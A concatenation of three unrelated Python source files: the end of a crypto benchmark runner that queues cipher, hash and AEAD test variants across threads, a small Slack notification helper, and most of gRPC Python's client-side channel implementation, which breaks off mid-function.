print(' Cache: {}'.format("cold" if cold_cache else "warm"), file=sys.stderr)
print(' SHANI: {}'.format("off" if shani_off else "on"), file=sys.stderr)
print(' GCM API: {}'.format("job" if gcm_job_api else "direct"), file=sys.stderr)
print(' Measuring using {}'.format("unhalted cycles" if unhalted_cycles \
else "rdtsc"), file=sys.stderr)
if quick_test is True or smoke_test is True:
print(' Test type: {}'.format("smoke" if smoke_test else "quick"), file=sys.stderr)
if job_iter is not None:
print(' Job iterations: {}'.format(job_iter), file=sys.stderr)
print(header, file=sys.stderr)
# fill todo queue with variants to test
for arch in archs:
if 'cipher-only' in alg_types:
for direction in directions:
for cipher_alg in cipher_algos:
# skip low performing ciphers for now
if 'des' in cipher_alg or 'kasumi' in cipher_alg:
continue
TODO_Q.put(Variant(idx=TOTAL_VARIANTS, arch=arch, direction=direction,
offset=offset, sizes=sizes, cipher_alg=cipher_alg,
cold_cache=cold_cache, shani_off=shani_off,
gcm_job_api=gcm_job_api, unhalted_cycles=unhalted_cycles,
quick_test=quick_test, smoke_test=smoke_test, imix=imix,
aad_size=aad_size, job_iter=job_iter))
TOTAL_VARIANTS += 1
if 'hash-only' in alg_types:
# skip direction for hash only algs
for hash_alg in hash_algos:
# skip low performing algorithms for now
if 'kasumi' in hash_alg:
continue
TODO_Q.put(Variant(idx=TOTAL_VARIANTS, arch=arch, direction=None,
offset=offset, sizes=sizes, hash_alg=hash_alg,
cold_cache=cold_cache, shani_off=shani_off,
gcm_job_api=gcm_job_api, unhalted_cycles=unhalted_cycles,
quick_test=quick_test, smoke_test=smoke_test, imix=imix,
aad_size=aad_size, job_iter=job_iter))
TOTAL_VARIANTS += 1
if 'aead-only' in alg_types:
for direction in directions:
for aead_alg in aead_algos:
TODO_Q.put(Variant(idx=TOTAL_VARIANTS, arch=arch, direction=direction,
offset=offset, sizes=sizes, aead_alg=aead_alg,
cold_cache=cold_cache, shani_off=shani_off,
gcm_job_api=gcm_job_api, unhalted_cycles=unhalted_cycles,
quick_test=quick_test, smoke_test=smoke_test, imix=imix,
aad_size=aad_size, job_iter=job_iter))
TOTAL_VARIANTS += 1
if 'cipher-hash-all' in alg_types:
for direction in directions:
# all cipher + hash combinations
for cipher_alg in cipher_algos:
for hash_alg in hash_algos:
TODO_Q.put(Variant(idx=TOTAL_VARIANTS, arch=arch, direction=direction,
offset=offset, sizes=sizes, cipher_alg=cipher_alg,
hash_alg=hash_alg, cold_cache=cold_cache,
shani_off=shani_off, gcm_job_api=gcm_job_api,
unhalted_cycles=unhalted_cycles, quick_test=quick_test,
smoke_test=smoke_test, imix=imix, aad_size=aad_size,
job_iter=job_iter))
TOTAL_VARIANTS += 1
# take starting timestamp
start_ts = time.time()
# If cores selected start a new thread on each core
# otherwise start single thread without specifying a core
#
# Each thread takes a variant from the todo queue
# and places it in the done queue when complete
if cores is None:
threading.Thread(target=run_test).start()
else:
for core in cores:
threading.Thread(target=run_test, args=(core,)).start()
# wait for all threads to complete
TODO_Q.join()
# take end timestamp
end_ts = time.time()
# exit if error encountered
if EXIT_ERROR is True:
print('Error encountered while running tests!', file=sys.stderr)
sys.exit(1)
# output time taken to complete
runtime = end_ts - start_ts
if QUIET is False:
print("Time to complete: {:.3f} seconds" \
.format(runtime), file=sys.stderr)
# transfer completed runs from the
# done queue to the results list
while DONE_Q.empty() is False:
variant = DONE_Q.get()
result.append(variant)
# sort by idx
result.sort(key=lambda x: x.get_idx())
# parse results and print to stdout
output = parse_results(result)
for line in output:
print(line)
if __name__ == "__main__":
main()
|
notification.py
|
# -*- coding: utf-8 -*-
"""
Slack notifications.
"""
import threading
import logging
from law.config import Config
logger = logging.getLogger(__name__)
def notify_slack(title, content, attachment_color="#4bb543", attachment_fallback=None,
short_threshold=40, token=None, channel=None, **kwargs):
# test import
import slackclient # noqa: F401
cfg = Config.instance()
if not token:
token = cfg.get_expanded("notifications", "slack_token")
if not channel:
channel = cfg.get_expanded("notifications", "slack_channel")
if not token or not channel:
logger.warning("cannot send slack notification, token ({}) or channel ({}) empty".format(
token, channel))
return False
request = {
"channel": channel,
"text": title,
"attachments": {
"color": attachment_color,
"fields": [],
},
"as_user": True,
"parse": "full",
}
if attachment_fallback:
request["attachments"]["fallback"] = attachment_fallback
for key, value in content.items():
request["attachments"]["fields"].append({
"title": key,
"value": value,
"short": len(value) <= short_threshold,
})
request["attachments"]["fallback"] += "_{}_: {}\n\n".format(key, value)
thread = threading.Thread(target=_notify_slack, args=(token, request))
thread.start()
return True
def _notify_slack(token, request):
import os
import json
import traceback
import six
import slackclient
try:
# token might be a file
if os.path.isfile(token):
with open(token, "r") as f:
token = f.read().strip()
if not isinstance(request["attachments"], six.string_types):
request["attachments"] = json.dumps([request["attachments"]])
sc = slackclient.SlackClient(token)
res = sc.api_call("chat.postMessage", **request)
if not res["ok"]:
logger.warning("unsuccessful Slack API call: {}".format(res))
except Exception as e:
t = traceback.format_exc()
logger.warning("could not send Slack notification: {}\n{}".format(e, t))
|
_channel.py
|
# Copyright 2016 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Invocation-side implementation of gRPC Python."""
import copy
import functools
import logging
import os
import sys
import threading
import time
import grpc
import grpc.experimental
from grpc import _compression
from grpc import _common
from grpc import _grpcio_metadata
from grpc._cython import cygrpc
_LOGGER = logging.getLogger(__name__)
_USER_AGENT = 'grpc-python/{}'.format(_grpcio_metadata.__version__)
_EMPTY_FLAGS = 0
# NOTE(rbellevi): No guarantees are given about the maintenance of this
# environment variable.
_DEFAULT_SINGLE_THREADED_UNARY_STREAM = os.getenv(
"GRPC_SINGLE_THREADED_UNARY_STREAM") is not None
_UNARY_UNARY_INITIAL_DUE = (
cygrpc.OperationType.send_initial_metadata,
cygrpc.OperationType.send_message,
cygrpc.OperationType.send_close_from_client,
cygrpc.OperationType.receive_initial_metadata,
cygrpc.OperationType.receive_message,
cygrpc.OperationType.receive_status_on_client,
)
_UNARY_STREAM_INITIAL_DUE = (
cygrpc.OperationType.send_initial_metadata,
cygrpc.OperationType.send_message,
cygrpc.OperationType.send_close_from_client,
cygrpc.OperationType.receive_initial_metadata,
cygrpc.OperationType.receive_status_on_client,
)
_STREAM_UNARY_INITIAL_DUE = (
cygrpc.OperationType.send_initial_metadata,
cygrpc.OperationType.receive_initial_metadata,
cygrpc.OperationType.receive_message,
cygrpc.OperationType.receive_status_on_client,
)
_STREAM_STREAM_INITIAL_DUE = (
cygrpc.OperationType.send_initial_metadata,
cygrpc.OperationType.receive_initial_metadata,
cygrpc.OperationType.receive_status_on_client,
)
_CHANNEL_SUBSCRIPTION_CALLBACK_ERROR_LOG_MESSAGE = (
'Exception calling channel subscription callback!')
_OK_RENDEZVOUS_REPR_FORMAT = ('<{} of RPC that terminated with:\n'
'\tstatus = {}\n'
'\tdetails = "{}"\n'
'>')
_NON_OK_RENDEZVOUS_REPR_FORMAT = ('<{} of RPC that terminated with:\n'
'\tstatus = {}\n'
'\tdetails = "{}"\n'
'\tdebug_error_string = "{}"\n'
'>')
def _deadline(timeout):
return None if timeout is None else time.time() + timeout
def _unknown_code_details(unknown_cygrpc_code, details):
return 'Server sent unknown code {} and details "{}"'.format(
unknown_cygrpc_code, details)
class _RPCState(object):
def __init__(self, due, initial_metadata, trailing_metadata, code, details):
self.condition = threading.Condition()
# The cygrpc.OperationType objects representing events due from the RPC's
# completion queue.
self.due = set(due)
self.initial_metadata = initial_metadata
self.response = None
self.trailing_metadata = trailing_metadata
self.code = code
self.details = details
self.debug_error_string = None
# The semantics of grpc.Future.cancel and grpc.Future.cancelled are
# slightly wonky, so they have to be tracked separately from the rest of the
# result of the RPC. This field tracks whether cancellation was requested
# prior to termination of the RPC.
self.cancelled = False
self.callbacks = []
self.fork_epoch = cygrpc.get_fork_epoch()
def reset_postfork_child(self):
self.condition = threading.Condition()
def _abort(state, code, details):
if state.code is None:
state.code = code
state.details = details
if state.initial_metadata is None:
state.initial_metadata = ()
state.trailing_metadata = ()
def _handle_event(event, state, response_deserializer):
callbacks = []
for batch_operation in event.batch_operations:
operation_type = batch_operation.type()
state.due.remove(operation_type)
if operation_type == cygrpc.OperationType.receive_initial_metadata:
state.initial_metadata = batch_operation.initial_metadata()
elif operation_type == cygrpc.OperationType.receive_message:
serialized_response = batch_operation.message()
if serialized_response is not None:
response = _common.deserialize(serialized_response,
response_deserializer)
if response is None:
details = 'Exception deserializing response!'
_abort(state, grpc.StatusCode.INTERNAL, details)
else:
state.response = response
elif operation_type == cygrpc.OperationType.receive_status_on_client:
state.trailing_metadata = batch_operation.trailing_metadata()
if state.code is None:
code = _common.CYGRPC_STATUS_CODE_TO_STATUS_CODE.get(
batch_operation.code())
if code is None:
state.code = grpc.StatusCode.UNKNOWN
state.details = _unknown_code_details(
code, batch_operation.details())
else:
state.code = code
state.details = batch_operation.details()
state.debug_error_string = batch_operation.error_string()
callbacks.extend(state.callbacks)
state.callbacks = None
return callbacks
def _event_handler(state, response_deserializer):
def handle_event(event):
with state.condition:
callbacks = _handle_event(event, state, response_deserializer)
state.condition.notify_all()
done = not state.due
for callback in callbacks:
try:
callback()
except Exception as e: # pylint: disable=broad-except
# NOTE(rbellevi): We suppress but log errors here so as not to
# kill the channel spin thread.
logging.error('Exception in callback %s: %s',
repr(callback.func), repr(e))
return done and state.fork_epoch >= cygrpc.get_fork_epoch()
return handle_event
#pylint: disable=too-many-statements
def _consume_request_iterator(request_iterator, state, call, request_serializer,
event_handler):
"""Consume a request iterator supplied by the user."""
def consume_request_iterator(): # pylint: disable=too-many-branches
# Iterate over the request iterator until it is exhausted or an error
# condition is encountered.
while True:
return_from_user_request_generator_invoked = False
try:
# The thread may die in user-code. Do not block fork for this.
cygrpc.enter_user_request_generator()
request = next(request_iterator)
except StopIteration:
break
except Exception: # pylint: disable=broad-except
cygrpc.return_from_user_request_generator()
return_from_user_request_generator_invoked = True
code = grpc.StatusCode.UNKNOWN
details = 'Exception iterating requests!'
_LOGGER.exception(details)
call.cancel(_common.STATUS_CODE_TO_CYGRPC_STATUS_CODE[code],
details)
_abort(state, code, details)
return
finally:
if not return_from_user_request_generator_invoked:
cygrpc.return_from_user_request_generator()
serialized_request = _common.serialize(request, request_serializer)
with state.condition:
if state.code is None and not state.cancelled:
if serialized_request is None:
code = grpc.StatusCode.INTERNAL
details = 'Exception serializing request!'
call.cancel(
_common.STATUS_CODE_TO_CYGRPC_STATUS_CODE[code],
details)
_abort(state, code, details)
return
else:
operations = (cygrpc.SendMessageOperation(
serialized_request, _EMPTY_FLAGS),)
operating = call.operate(operations, event_handler)
if operating:
state.due.add(cygrpc.OperationType.send_message)
else:
return
def _done():
return (state.code is not None or
cygrpc.OperationType.send_message not in
state.due)
_common.wait(state.condition.wait,
_done,
spin_cb=functools.partial(
cygrpc.block_if_fork_in_progress,
state))
if state.code is not None:
return
else:
return
with state.condition:
if state.code is None:
operations = (
cygrpc.SendCloseFromClientOperation(_EMPTY_FLAGS),)
operating = call.operate(operations, event_handler)
if operating:
state.due.add(cygrpc.OperationType.send_close_from_client)
consumption_thread = cygrpc.ForkManagedThread(
target=consume_request_iterator)
consumption_thread.setDaemon(True)
consumption_thread.start()
def _rpc_state_string(class_name, rpc_state):
"""Calculates error string for RPC."""
with rpc_state.condition:
if rpc_state.code is None:
return '<{} object>'.format(class_name)
elif rpc_state.code is grpc.StatusCode.OK:
return _OK_RENDEZVOUS_REPR_FORMAT.format(class_name, rpc_state.code,
rpc_state.details)
else:
return _NON_OK_RENDEZVOUS_REPR_FORMAT.format(
class_name, rpc_state.code, rpc_state.details,
rpc_state.debug_error_string)
class _InactiveRpcError(grpc.RpcError, grpc.Call, grpc.Future):
"""An RPC error not tied to the execution of a particular RPC.
The RPC represented by the state object must not be in-progress or
cancelled.
Attributes:
_state: An instance of _RPCState.
"""
def __init__(self, state):
with state.condition:
self._state = _RPCState((), copy.deepcopy(state.initial_metadata),
copy.deepcopy(state.trailing_metadata),
state.code, copy.deepcopy(state.details))
self._state.response = copy.copy(state.response)
self._state.debug_error_string = copy.copy(state.debug_error_string)
def initial_metadata(self):
return self._state.initial_metadata
def trailing_metadata(self):
return self._state.trailing_metadata
def code(self):
return self._state.code
def details(self):
return _common.decode(self._state.details)
def debug_error_string(self):
return _common.decode(self._state.debug_error_string)
def _repr(self):
return _rpc_state_string(self.__class__.__name__, self._state)
def __repr__(self):
return self._repr()
def __str__(self):
return self._repr()
def cancel(self):
"""See grpc.Future.cancel."""
return False
def cancelled(self):
"""See grpc.Future.cancelled."""
return False
def running(self):
"""See grpc.Future.running."""
return False
def done(self):
"""See grpc.Future.done."""
return True
def result(self, timeout=None): # pylint: disable=unused-argument
"""See grpc.Future.result."""
raise self
def exception(self, timeout=None): # pylint: disable=unused-argument
"""See grpc.Future.exception."""
return self
def traceback(self, timeout=None): # pylint: disable=unused-argument
"""See grpc.Future.traceback."""
try:
raise self
except grpc.RpcError:
return sys.exc_info()[2]
def add_done_callback(self, fn, timeout=None): # pylint: disable=unused-argument
"""See grpc.Future.add_done_callback."""
fn(self)
class _Rendezvous(grpc.RpcError, grpc.RpcContext):
"""An RPC iterator.
Attributes:
_state: An instance of _RPCState.
_call: An instance of SegregatedCall or IntegratedCall.
In either case, the _call object is expected to have operate, cancel,
and next_event methods.
_response_deserializer: A callable taking bytes and return a Python
object.
_deadline: A float representing the deadline of the RPC in seconds. Or
possibly None, to represent an RPC with no deadline at all.
"""
def __init__(self, state, call, response_deserializer, deadline):
super(_Rendezvous, self).__init__()
self._state = state
self._call = call
self._response_deserializer = response_deserializer
self._deadline = deadline
def is_active(self):
"""See grpc.RpcContext.is_active"""
with self._state.condition:
return self._state.code is None
def time_remaining(self):
"""See grpc.RpcContext.time_remaining"""
with self._state.condition:
if self._deadline is None:
return None
else:
return max(self._deadline - time.time(), 0)
def cancel(self):
"""See grpc.RpcContext.cancel"""
with self._state.condition:
if self._state.code is None:
code = grpc.StatusCode.CANCELLED
details = 'Locally cancelled by application!'
self._call.cancel(
_common.STATUS_CODE_TO_CYGRPC_STATUS_CODE[code], details)
self._state.cancelled = True
_abort(self._state, code, details)
self._state.condition.notify_all()
return True
else:
return False
def add_callback(self, callback):
"""See grpc.RpcContext.add_callback"""
with self._state.condition:
if self._state.callbacks is None:
return False
else:
self._state.callbacks.append(callback)
return True
def __iter__(self):
return self
def next(self):
return self._next()
def __next__(self):
return self._next()
def _next(self):
raise NotImplementedError()
def debug_error_string(self):
raise NotImplementedError()
def _repr(self):
return _rpc_state_string(self.__class__.__name__, self._state)
def __repr__(self):
return self._repr()
def __str__(self):
return self._repr()
def __del__(self):
with self._state.condition:
if self._state.code is None:
self._state.code = grpc.StatusCode.CANCELLED
self._state.details = 'Cancelled upon garbage collection!'
self._state.cancelled = True
self._call.cancel(
_common.STATUS_CODE_TO_CYGRPC_STATUS_CODE[self._state.code],
self._state.details)
self._state.condition.notify_all()
class _SingleThreadedRendezvous(_Rendezvous, grpc.Call): # pylint: disable=too-many-ancestors
"""An RPC iterator operating entirely on a single thread.
The __next__ method of _SingleThreadedRendezvous does not depend on the
existence of any other thread, including the "channel spin thread".
However, this means that its interface is entirely synchronous. So this
class cannot fulfill the grpc.Future interface.
"""
def initial_metadata(self):
"""See grpc.Call.initial_metadata"""
with self._state.condition:
# NOTE(gnossen): Based on our initial call batch, we are guaranteed
# to receive initial metadata before any messages.
while self._state.initial_metadata is None:
self._consume_next_event()
return self._state.initial_metadata
def trailing_metadata(self):
"""See grpc.Call.trailing_metadata"""
with self._state.condition:
if self._state.trailing_metadata is None:
raise grpc.experimental.UsageError(
"Cannot get trailing metadata until RPC is completed.")
return self._state.trailing_metadata
def code(self):
"""See grpc.Call.code"""
with self._state.condition:
if self._state.code is None:
raise grpc.experimental.UsageError(
"Cannot get code until RPC is completed.")
return self._state.code
def details(self):
"""See grpc.Call.details"""
with self._state.condition:
if self._state.details is None:
raise grpc.experimental.UsageError(
"Cannot get details until RPC is completed.")
return _common.decode(self._state.details)
def _consume_next_event(self):
event = self._call.next_event()
with self._state.condition:
callbacks = _handle_event(event, self._state,
self._response_deserializer)
for callback in callbacks:
# NOTE(gnossen): We intentionally allow exceptions to bubble up
# to the user when running on a single thread.
callback()
return event
def _next_response(self):
while True:
self._consume_next_event()
with self._state.condition:
if self._state.response is not None:
response = self._state.response
self._state.response = None
return response
elif cygrpc.OperationType.receive_message not in self._state.due:
if self._state.code is grpc.StatusCode.OK:
raise StopIteration()
elif self._state.code is not None:
raise self
def _next(self):
with self._state.condition:
if self._state.code is None:
operating = self._call.operate(
(cygrpc.ReceiveMessageOperation(_EMPTY_FLAGS),), None)
if operating:
self._state.due.add(cygrpc.OperationType.receive_message)
elif self._state.code is grpc.StatusCode.OK:
raise StopIteration()
else:
raise self
return self._next_response()
def debug_error_string(self):
with self._state.condition:
if self._state.debug_error_string is None:
raise grpc.experimental.UsageError(
"Cannot get debug error string until RPC is completed.")
return _common.decode(self._state.debug_error_string)
class _MultiThreadedRendezvous(_Rendezvous, grpc.Call, grpc.Future): # pylint: disable=too-many-ancestors
"""An RPC iterator that depends on a channel spin thread.
This iterator relies upon a per-channel thread running in the background,
dequeueing events from the completion queue, and notifying threads waiting
on the threading.Condition object in the _RPCState object.
This extra thread allows _MultiThreadedRendezvous to fulfill the grpc.Future interface
and to mediate a bidirection streaming RPC.
"""
def initial_metadata(self):
"""See grpc.Call.initial_metadata"""
with self._state.condition:
def _done():
return self._state.initial_metadata is not None
_common.wait(self._state.condition.wait, _done)
return self._state.initial_metadata
def trailing_metadata(self):
"""See grpc.Call.trailing_metadata"""
with self._state.condition:
def _done():
return self._state.trailing_metadata is not None
_common.wait(self._state.condition.wait, _done)
return self._state.trailing_metadata
def code(self):
"""See grpc.Call.code"""
with self._state.condition:
def _done():
return self._state.code is not None
_common.wait(self._state.condition.wait, _done)
return self._state.code
def details(self):
"""See grpc.Call.details"""
with self._state.condition:
def _done():
return self._state.details is not None
_common.wait(self._state.condition.wait, _done)
return _common.decode(self._state.details)
def debug_error_string(self):
with self._state.condition:
def _done():
return self._state.debug_error_string is not None
_common.wait(self._state.condition.wait, _done)
return _common.decode(self._state.debug_error_string)
def cancelled(self):
with self._state.condition:
return self._state.cancelled
def running(self):
with self._state.condition:
return self._state.code is None
def done(self):
with self._state.condition:
return self._state.code is not None
def _is_complete(self):
return self._state.code is not None
def result(self, timeout=None):
"""Returns the result of the computation or raises its exception.
See grpc.Future.result for the full API contract.
"""
with self._state.condition:
timed_out = _common.wait(self._state.condition.wait,
self._is_complete,
timeout=timeout)
if timed_out:
raise grpc.FutureTimeoutError()
else:
if self._state.code is grpc.StatusCode.OK:
return self._state.response
elif self._state.cancelled:
raise grpc.FutureCancelledError()
else:
raise self
def exception(self, timeout=None):
"""Return the exception raised by the computation.
See grpc.Future.exception for the full API contract.
"""
with self._state.condition:
timed_out = _common.wait(self._state.condition.wait,
self._is_complete,
timeout=timeout)
if timed_out:
raise grpc.FutureTimeoutError()
else:
if self._state.code is grpc.StatusCode.OK:
return None
elif self._state.cancelled:
raise grpc.FutureCancelledError()
else:
return self
def traceback(self, timeout=None):
"""Access the traceback of the exception raised by the computation.
See grpc.future.traceback for the full API contract.
"""
with self._state.condition:
timed_out = _common.wait(self._state.condition.wait,
self._is_complete,
timeout=timeout)
if timed_out:
raise grpc.FutureTimeoutError()
else:
if self._state.code is grpc.StatusCode.OK:
return None
elif self._state.cancelled:
raise grpc.FutureCancelledError()
else:
try:
raise self
except grpc.RpcError:
return sys.exc_info()[2]
def add_done_callback(self, fn):
with self._state.condition:
if self._state.code is None:
self._state.callbacks.append(functools.partial(fn, self))
return
fn(self)
def _next(self):
with self._state.condition:
if self._state.code is None:
event_handler = _event_handler(self._state,
self._response_deserializer)
operating = self._call.operate(
(cygrpc.ReceiveMessageOperation(_EMPTY_FLAGS),),
event_handler)
if operating:
self._state.due.add(cygrpc.OperationType.receive_message)
elif self._state.code is grpc.StatusCode.OK:
raise StopIteration()
else:
raise self
def _response_ready():
return (
self._state.response is not None or
(cygrpc.OperationType.receive_message not in self._state.due
and self._state.code is not None))
_common.wait(self._state.condition.wait, _response_ready)
if self._state.response is not None:
response = self._state.response
self._state.response = None
return response
elif cygrpc.OperationType.receive_message not in self._state.due:
if self._state.code is grpc.StatusCode.OK:
raise StopIteration()
elif self._state.code is not None:
raise self
def _start_unary_request(request, timeout, request_serializer):
deadline = _deadline(timeout)
serialized_request = _common.serialize(request, request_serializer)
if serialized_request is None:
state = _RPCState((), (), (), grpc.StatusCode.INTERNAL,
'Exception serializing request!')
error = _InactiveRpcError(state)
return deadline, None, error
else:
return deadline, serialized_request, None
def _end_unary_response_blocking(state, call, with_call, deadline):
if state.code is grpc.StatusCode.OK:
if with_call:
rendezvous = _MultiThreadedRendezvous(state, call, None, deadline)
return state.response, rendezvous
else:
return state.response
else:
raise _InactiveRpcError(state)
def _stream_unary_invocation_operationses(metadata, initial_metadata_flags):
return (
(
cygrpc.SendInitialMetadataOperation(metadata,
initial_metadata_flags),
cygrpc.ReceiveMessageOperation(_EMPTY_FLAGS),
cygrpc.ReceiveStatusOnClientOperation(_EMPTY_FLAGS),
),
(cygrpc.ReceiveInitialMetadataOperation(_EMPTY_FLAGS),),
)
def _stream_unary_invocation_operationses_and_tags(metadata,
initial_metadata_flags):
return tuple((
operations,
None,
) for operations in _stream_unary_invocation_operationses(
metadata, initial_metadata_flags))
def _determine_deadline(user_deadline):
parent_deadline = cygrpc.get_deadline_from_context()
if parent_deadline is None and user_deadline is None:
return None
elif parent_deadline is not None and user_deadline is None:
return parent_deadline
elif user_deadline is not None and parent_deadline is None:
return user_deadline
else:
return min(parent_deadline, user_deadline)
class _UnaryUnaryMultiCallable(grpc.UnaryUnaryMultiCallable):
# pylint: disable=too-many-arguments
def __init__(self, channel, managed_call, method, request_serializer,
response_deserializer):
self._channel = channel
self._managed_call = managed_call
self._method = method
self._request_serializer = request_serializer
self._response_deserializer = response_deserializer
self._context = cygrpc.build_census_context()
def _prepare(self, request, timeout, metadata, wait_for_ready, compression):
deadline, serialized_request, rendezvous = _start_unary_request(
request, timeout, self._request_serializer)
initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
wait_for_ready)
augmented_metadata = _compression.augment_metadata(
metadata, compression)
if serialized_request is None:
return None, None, None, rendezvous
else:
state = _RPCState(_UNARY_UNARY_INITIAL_DUE, None, None, None, None)
operations = (
cygrpc.SendInitialMetadataOperation(augmented_metadata,
initial_metadata_flags),
cygrpc.SendMessageOperation(serialized_request, _EMPTY_FLAGS),
cygrpc.SendCloseFromClientOperation(_EMPTY_FLAGS),
cygrpc.ReceiveInitialMetadataOperation(_EMPTY_FLAGS),
cygrpc.ReceiveMessageOperation(_EMPTY_FLAGS),
cygrpc.ReceiveStatusOnClientOperation(_EMPTY_FLAGS),
)
return state, operations, deadline, None
def _blocking(self, request, timeout, metadata, credentials, wait_for_ready,
compression):
state, operations, deadline, rendezvous = self._prepare(
request, timeout, metadata, wait_for_ready, compression)
if state is None:
raise rendezvous # pylint: disable-msg=raising-bad-type
else:
call = self._channel.segregated_call(
cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS,
self._method, None, _determine_deadline(deadline), metadata,
None if credentials is None else credentials._credentials, ((
operations,
None,
),), self._context)
event = call.next_event()
_handle_event(event, state, self._response_deserializer)
return state, call
def __call__(self,
request,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None,
compression=None):
state, call, = self._blocking(request, timeout, metadata, credentials,
wait_for_ready, compression)
return _end_unary_response_blocking(state, call, False, None)
def with_call(self,
request,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None,
compression=None):
state, call, = self._blocking(request, timeout, metadata, credentials,
wait_for_ready, compression)
return _end_unary_response_blocking(state, call, True, None)
def future(self,
request,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None,
compression=None):
state, operations, deadline, rendezvous = self._prepare(
request, timeout, metadata, wait_for_ready, compression)
if state is None:
raise rendezvous # pylint: disable-msg=raising-bad-type
else:
event_handler = _event_handler(state, self._response_deserializer)
call = self._managed_call(
cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS,
self._method, None, deadline, metadata,
None if credentials is None else credentials._credentials,
(operations,), event_handler, self._context)
return _MultiThreadedRendezvous(state, call,
self._response_deserializer,
deadline)
class _SingleThreadedUnaryStreamMultiCallable(grpc.UnaryStreamMultiCallable):
# pylint: disable=too-many-arguments
def __init__(self, channel, method, request_serializer,
response_deserializer):
self._channel = channel
self._method = method
self._request_serializer = request_serializer
self._response_deserializer = response_deserializer
self._context = cygrpc.build_census_context()
def __call__( # pylint: disable=too-many-locals
self,
request,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None,
compression=None):
deadline = _deadline(timeout)
serialized_request = _common.serialize(request,
self._request_serializer)
if serialized_request is None:
state = _RPCState((), (), (), grpc.StatusCode.INTERNAL,
'Exception serializing request!')
raise _InactiveRpcError(state)
state = _RPCState(_UNARY_STREAM_INITIAL_DUE, None, None, None, None)
call_credentials = None if credentials is None else credentials._credentials
initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
wait_for_ready)
augmented_metadata = _compression.augment_metadata(
metadata, compression)
operations = (
(cygrpc.SendInitialMetadataOperation(augmented_metadata,
initial_metadata_flags),
cygrpc.SendMessageOperation(serialized_request, _EMPTY_FLAGS),
cygrpc.SendCloseFromClientOperation(_EMPTY_FLAGS)),
(cygrpc.ReceiveStatusOnClientOperation(_EMPTY_FLAGS),),
(cygrpc.ReceiveInitialMetadataOperation(_EMPTY_FLAGS),),
)
operations_and_tags = tuple((ops, None) for ops in operations)
call = self._channel.segregated_call(
cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS, self._method,
None, _determine_deadline(deadline), metadata, call_credentials,
operations_and_tags, self._context)
return _SingleThreadedRendezvous(state, call,
self._response_deserializer, deadline)
class _UnaryStreamMultiCallable(grpc.UnaryStreamMultiCallable):
# pylint: disable=too-many-arguments
def __init__(self, channel, managed_call, method, request_serializer,
response_deserializer):
self._channel = channel
self._managed_call = managed_call
self._method = method
self._request_serializer = request_serializer
self._response_deserializer = response_deserializer
self._context = cygrpc.build_census_context()
def __call__( # pylint: disable=too-many-locals
self,
request,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None,
compression=None):
deadline, serialized_request, rendezvous = _start_unary_request(
request, timeout, self._request_serializer)
initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
wait_for_ready)
if serialized_request is None:
raise rendezvous # pylint: disable-msg=raising-bad-type
else:
augmented_metadata = _compression.augment_metadata(
metadata, compression)
state = _RPCState(_UNARY_STREAM_INITIAL_DUE, None, None, None, None)
operationses = (
(
cygrpc.SendInitialMetadataOperation(augmented_metadata,
initial_metadata_flags),
cygrpc.SendMessageOperation(serialized_request,
_EMPTY_FLAGS),
cygrpc.SendCloseFromClientOperation(_EMPTY_FLAGS),
cygrpc.ReceiveStatusOnClientOperation(_EMPTY_FLAGS),
),
(cygrpc.ReceiveInitialMetadataOperation(_EMPTY_FLAGS),),
)
call = self._managed_call(
cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS,
self._method, None, _determine_deadline(deadline), metadata,
None if credentials is None else credentials._credentials,
operationses, _event_handler(state,
self._response_deserializer),
self._context)
return _MultiThreadedRendezvous(state, call,
self._response_deserializer,
deadline)
class _StreamUnaryMultiCallable(grpc.StreamUnaryMultiCallable):
# pylint: disable=too-many-arguments
def __init__(self, channel, managed_call, method, request_serializer,
response_deserializer):
self._channel = channel
self._managed_call = managed_call
self._method = method
self._request_serializer = request_serializer
self._response_deserializer = response_deserializer
self._context = cygrpc.build_census_context()
def _blocking(self, request_iterator, timeout, metadata, credentials,
wait_for_ready, compression):
deadline = _deadline(timeout)
state = _RPCState(_STREAM_UNARY_INITIAL_DUE, None, None, None, None)
initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
wait_for_ready)
augmented_metadata = _compression.augment_metadata(
metadata, compression)
call = self._channel.segregated_call(
cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS, self._method,
None, _determine_deadline(deadline), augmented_metadata,
None if credentials is None else credentials._credentials,
_stream_unary_invocation_operationses_and_tags(
augmented_metadata, initial_metadata_flags), self._context)
_consume_request_iterator(request_iterator, state, call,
self._request_serializer, None)
while True:
event = call.next_event()
with state.condition:
_handle_event(event, state, self._response_deserializer)
state.condition.notify_all()
if not state.due:
break
return state, call
def __call__(self,
request_iterator,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None,
compression=None):
state, call, = self._blocking(request_iterator, timeout, metadata,
credentials, wait_for_ready, compression)
return _end_unary_response_blocking(state, call, False, None)
def with_call(self,
request_iterator,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None,
compression=None):
state, call, = self._blocking(request_iterator, timeout, metadata,
credentials, wait_for_ready, compression)
return _end_unary_response_blocking(state, call, True, None)
def future(self,
request_iterator,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None,
compression=None):
deadline = _deadline(timeout)
state = _RPCState(_STREAM_UNARY_INITIAL_DUE, None, None, None, None)
event_handler = _event_handler(state, self._response_deserializer)
initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
wait_for_ready)
augmented_metadata = _compression.augment_metadata(
metadata, compression)
call = self._managed_call(
